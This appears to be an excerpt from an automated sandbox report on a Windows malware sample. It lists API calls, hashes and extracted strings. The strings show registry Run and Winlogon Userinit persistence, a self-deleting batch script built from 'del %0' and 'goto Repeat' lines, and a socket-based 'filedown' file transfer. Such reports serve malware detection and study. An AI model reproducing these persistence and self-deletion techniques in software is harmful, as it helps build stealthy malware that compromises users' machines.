                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bba3e4718dbdc75b72417a0249ace700e515a5928d43ceadd18bfbdad54d5587
                                          • Instruction ID: 1364cb1d12eabb9626d35066541146f39bd6914f24beff9e251c0f817e1c4944
                                          • Opcode Fuzzy Hash: bba3e4718dbdc75b72417a0249ace700e515a5928d43ceadd18bfbdad54d5587
                                          • Instruction Fuzzy Hash: D0D05E70611144EBCB04CB58C94574E76F8A705744F604865D001EB290C278EE40E704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415918,00410668,74B5FBA0), ref: 00406D6B
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415918,00410668,74B5FBA0), ref: 00406D90
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(explorer.exe,?,00000001,00415918,00410668,74B5FBA0), ref: 00406DBF
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe,?,00000001,00415918,00410668,74B5FBA0), ref: 00406DED
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415918,00410668,74B5FBA0), ref: 00406E0D
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415918,00410668,74B5FBA0), ref: 00406E29
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00406E32
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,00000000), ref: 00406E4C
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406E73
                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 00406EA2
                                            • Part of subcall function 0040524E: TerminateThread.KERNEL32(0040382C,00000000,00415918,00410668,00406D48,00415918,00410668,74B5FBA0), ref: 00405263
                                            • Part of subcall function 0040524E: UnhookWindowsHookEx.USER32(00000000), ref: 0040526C
                                            • Part of subcall function 0040524E: TerminateThread.KERNEL32(0040380C,00000000), ref: 0040527C
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00406E7D
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00406E85
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415918,00410668), ref: 00406EB6
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000080), ref: 00406EC8
                                          • SetFileAttributesA.KERNEL32(00000000), ref: 00406ECF
                                          • getenv.MSVCRT ref: 00406EE4
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00406EEF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406EFA
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406F07
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406F12
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406F1B
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,00000001), ref: 00406F28
                                          • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00406F35
                                          • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00406F41
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,:Repeat), ref: 00406F61
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,00410F2C), ref: 00406F79
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,del ",00000000), ref: 00406F89
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406F96
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 00406FA3
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406FAE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406FB7
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406FC0
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?," goto Repeat), ref: 00406FDF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,if exist ",00000000), ref: 00406FEF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406FFC
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 00407009
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407014
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040701D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407026
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415918,00410668), ref: 00407032
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,@RD /Q ",00415918,00410F2C), ref: 00407049
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00410F2C), ref: 00407056
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000,?,?,?,?,00410F2C), ref: 00407063
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 0040706E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 00407077
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00410860,?,00410F2C), ref: 0040708B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00410F2C), ref: 00407098
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000,?,?,?,?,00410F2C), ref: 004070A5
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070B0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070B9
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,del %0 ,?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070CB
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,exit ,?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070D9
                                          • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070E4
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000), ref: 004070F2
                                          • ShellExecuteA.SHELL32(00000000,open,00000000), ref: 004070FF
                                          • exit.MSVCRT ref: 00407106
                                          • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 00407112
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 0040711B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 00407124
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$V?$basic_string@$??1?$basic_string@$V10@$D@2@@0@$Hstd@@$?c_str@?$basic_string@$??6std@@D@std@@@0@V?$basic_ostream@$??0?$basic_string@D@1@@$D@2@@0@@D@std@@@std@@V10@@$File$??9std@@AttributesTerminateThread$??0?$basic_ofstream@?close@?$basic_ofstream@?is_open@?$basic_ofstream@?size@?$basic_string@D?$basic_ofstream@DeleteExecuteHookModuleNameShellUnhookWindowsexitgetenv
                                          • String ID: " goto Repeat$:Repeat$@RD /Q "$C:\WINDOWS\system32\userinit.exe$EXEpath$Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$Userinit$del "$del %0 $exit $explorer.exe$if exist "$open$update.bat
                                          • API String ID: 3539474836-3658685564
                                          • Opcode ID: 939fdcaa365f2f9e0a4b8f923dddd67c95833ac78a1ffec8c77c10da8eb6e1f2
                                          • Instruction ID: 85814611d3c695b275b499f4b080fe16a1c3fdb49b7e8a264d8a5f024fe5fead
                                          • Opcode Fuzzy Hash: 939fdcaa365f2f9e0a4b8f923dddd67c95833ac78a1ffec8c77c10da8eb6e1f2
                                          • Instruction Fuzzy Hash: C7B16172940109ABDB10EBA0DD4EEDE7B7DAB54304F1040B7F506B2191DBB89E898B6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415940,7313CB00,00000001), ref: 004069CA
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415940,7313CB00,00000001), ref: 004069EF
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(explorer.exe,?,00000001,00415940,7313CB00,00000001), ref: 00406A1E
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe,?,00000001,00415940,7313CB00,00000001), ref: 00406A4C
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415940,7313CB00,00000001), ref: 00406A6C
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,7313CB00,00000001), ref: 00406A9F
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00406AA8
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000,00000000), ref: 00406AC2
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406AE9
                                            • Part of subcall function 0040524E: TerminateThread.KERNEL32(0040382C,00000000,00415918,00410668,00406D48,00415918,00410668,74B5FBA0), ref: 00405263
                                            • Part of subcall function 0040524E: UnhookWindowsHookEx.USER32(00000000), ref: 0040526C
                                            • Part of subcall function 0040524E: TerminateThread.KERNEL32(0040380C,00000000), ref: 0040527C
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00406AF3
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00406AFB
                                          • getenv.MSVCRT ref: 00406B0F
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00406B1A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406B25
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406B30
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415918,00410668), ref: 00406B46
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000080), ref: 00406B62
                                          • SetFileAttributesA.KERNEL32(00000000), ref: 00406B69
                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 00406B77
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 00406B87
                                          • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00406B94
                                          • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00406BA0
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,:Repeat), ref: 00406BC0
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,00410F2C), ref: 00406BD7
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,del ",00000000), ref: 00406BE7
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406BF4
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 00406C01
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C0C
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C15
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C1E
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?," goto Repeat), ref: 00406C3D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,if exist ",00000000), ref: 00406C4D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406C5A
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 00406C67
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C72
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C7B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C84
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415918,00410668), ref: 00406C8C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,@RD /Q ",00415918,00410F2C), ref: 00406CA7
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00410F2C), ref: 00406CB4
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000,?,?,?,?,00410F2C), ref: 00406CC1
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 00406CCC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 00406CD5
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,del %0 ), ref: 00406CE7
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,exit ), ref: 00406CF5
                                          • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 00406D00
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410668,00410668,00000000), ref: 00406D0D
                                          • ShellExecuteA.SHELL32(00000000,open,00000000), ref: 00406D1B
                                          • exit.MSVCRT ref: 00406D23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$V?$basic_string@$V10@$??1?$basic_string@?c_str@?$basic_string@D@2@@0@$Hstd@@$??6std@@D@std@@@0@V?$basic_ostream@$??0?$basic_string@D@1@@$D@2@@0@@D@std@@@std@@FileV10@@$??9std@@AttributesTerminateThread$??0?$basic_ofstream@?close@?$basic_ofstream@?is_open@?$basic_ofstream@?size@?$basic_string@DeleteExecuteHookModuleNameShellUnhookWindowsexitgetenv
                                          • String ID: " goto Repeat$:Repeat$@RD /Q "$C:\WINDOWS\system32\userinit.exe$EXEpath$Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$Userinit$\uninstall.bat$del "$del %0 $exit $explorer.exe$if exist "$open
                                          • API String ID: 2435849188-468332953
                                          • Opcode ID: 59b310098eb89ae822d7a6e4498852e0b99b398af8ab11746d0502617c4c2780
                                          • Instruction ID: 79bb7098ec12771f3f12c2aeb3a0bf44cec98225d0af6e33e903258e68a155bd
                                          • Opcode Fuzzy Hash: 59b310098eb89ae822d7a6e4498852e0b99b398af8ab11746d0502617c4c2780
                                          • Instruction Fuzzy Hash: A8A17172940209ABDB10ABA0DD4AFDE777DEB54304F1040BBF506B2191DAF85EC98B6D
                                           Uniqueness
                                           • Uniqueness Score: -1.00%
                                          APIs
                                            • Part of subcall function 004020E1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00415268,?,?,00403DDD,00000001), ref: 004020EF
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024,00000001,00000001,00000000,7313CB00,7313CB00), ref: 0040CAC3
                                          • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040CAD0
                                          • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040CADC
                                          • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?), ref: 0040CAF4
                                            • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                                          • __aulldiv.LIBCMT ref: 0040CB38
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040CB71
                                          • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(0040C0FA,00000000,?,?,0000FDE8,00000000), ref: 0040CB85
                                          • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(?,0000FDE8), ref: 0040CB95
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,0000FDE8,?), ref: 0040CBA6
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,filedown,00415268,?,00415268,00000001,00415268,?,00415268,00000000,00415268,00000000,00415268,?,00415268,00000000), ref: 0040CBF1
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,00000000), ref: 0040CC01
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00000000), ref: 0040CC0E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00000000), ref: 0040CC1E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040CC2E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040CC3E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC4E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC5B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC6B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC7B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC8B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC9B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CCAB
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCD4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCE0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCEC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCF8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD04
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD0D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD19
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD25
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD31
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD3D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD46
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD52
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD5E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD67
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD70
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD79
                                            • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CCB5
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,0000FDE8,00000000), ref: 0040CDBA
                                          • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040CDE3
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,err_notopenfile,00415268,?,00415268,?), ref: 0040CE08
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,?), ref: 0040CE15
